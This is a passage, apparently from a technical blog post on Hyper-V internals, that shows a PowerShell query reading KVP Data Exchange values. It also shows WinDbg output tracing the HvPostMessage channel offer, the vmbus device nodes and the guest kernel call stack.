<span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$vm</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GetRelated(</span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Msvm_KvpExchangeComponent"</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GuestExchangeItems </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">|</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">%</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> { </span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$GuestExchangeItemXml</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[</span><span style="background-color: transparent; color: teal; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XML</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">]</span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$_</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SelectSingleNode(</span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"/INSTANCE/PROPERTY[@NAME='Name']/VALUE[child::text() = 'KvPDataKey']"</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: darkblue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (</span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$GuestExchangeItemXml</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-ne</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$null</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> { </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$GuestExchangeItemXml</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SelectSingleNode(</span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"/INSTANCE/PROPERTY[@NAME='Data']/VALUE/child::text()"</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Value </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> } </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The script will return the value of the key KvPDataKey:</span><span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">: </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="40" src="https://lh3.googleusercontent.com/FUrqOA4ikYsUyFDPyVEkQczgLRPfC_kqnSVIlyp2ErQAqRRjWI1dBDAlwCYamW5SPTrH5x-uota5Y_H6ts5P31O7lL-nls9isqbosJ7AA_av7MOs43v6sU3CvR4hrfqZg0x791WS2Djk9WBc" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="134" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note that even though that the script gets all the available set of values by using the </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$vm.GetRelated("Msvm_KvpExchangeComponent").GuestExchangeItems and only after it parses every object for key KvPDataKey. Accordingly the script will work only when the component Data Exchange is enabled in the virtual machine properties.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When you activate a component Data Exchanger root OS through hypercall HvPostMessage guest OS sends a message with the code CHANNELMSG_OFFERCHANNEL:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @rcx – rcx is the input parameter for the hypercall HvPostMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff000 00000001 00000000 00000001 000000c4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff010 00000001 00000000 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a9a0f4e7 4d965a45</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff020 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">848a27b8 e6038c1e 242ff919 418007db</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff030 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6cb82e9c 558c8cb6 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`002ff040 00000000 00000000 00000011 00000004</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can draw attention to the fact that the data containing the GUID of the device is connected to the vmbus, as a child device:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devnode \Driver\vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dumping IopRootDeviceNode (= 0xffffe0002bd2ed30)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DevNode </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xffffe0002bd2ed30</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for PDO 0xffffe0002bd2fe50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devnode 0xffffe0002bd2ed30 1 vmbus</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DevNode 0xffffe0002c03cd30 for PDO 0xffffe0002c00db00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> InstancePath is "VMBUS\</span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{a9a0f4e7-5a45-4d96-b827-8a841e8c03e6}\{242ff919-07db-4180-9c2e-b86cb68c8c55</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> State = DeviceNodeStarted (0x308)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Previous State = DeviceNodeEnumerateCompletion (0x30d)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………………………………………………</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After this function is called in guest OS vmbus!InstanceDeviceControl The entire stack looks like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kс</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IoAllocateMdl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!InstanceCloseChannel+0x22d (return to function without symbol name)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!InstanceDeviceControl+0x118</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxIoQueue::DispatchRequestToDriver+0x1be</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxIoQueue::DispatchEvents+0x363</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxIoQueue::QueueRequest+0x8d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxDevice::DispatchWithLock+0xb51</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclpSynchronousIoControl+0xa7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclpClientOpenChannel+0x2a6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclpClientFindVmbusAndUnlock+0x162</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!VmbChannelEnable+0x231</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PipeStartChannel+0x9e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PipeAccept+0x81</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!InstanceCreate+0x90</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxFileObjectFileCreate::Invoke+0x3f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxPkgGeneral::OnCreate+0xb16</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxPkgGeneral::Dispatch+0x3d9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wdf01000!FxDevice::DispatchWithLock+0x7d8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopParseDevice+0x7b3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!ObpLookupObjectName+0x6d8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!ObOpenObjectByName+0x1e3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopCreateFile+0x372</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtCreateFile+0x78</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!NtCreateFile+0xa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KERNELBASE!CreateFileInternal+0x30a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KERNELBASE!CreateFileW+0x66</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbuspipe!VmbusPipeClientOpenChannel+0x44</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">icsvc!ICTransportVMBus::ClientNotification+0x60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbuspipe!VmbusPipeClientEnumeratePipes+0x1ac</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICTransportVMBusClient::Open+0xe5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICEndpoint::Connect+0x66</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICChild::Run+0x65</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICKvpExchangeChild::Run+0x189</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICChild::ICServiceWork+0x137</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICChild::ICServiceMain+0x8f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">svchost!ServiceStarter+0x358</span></div>
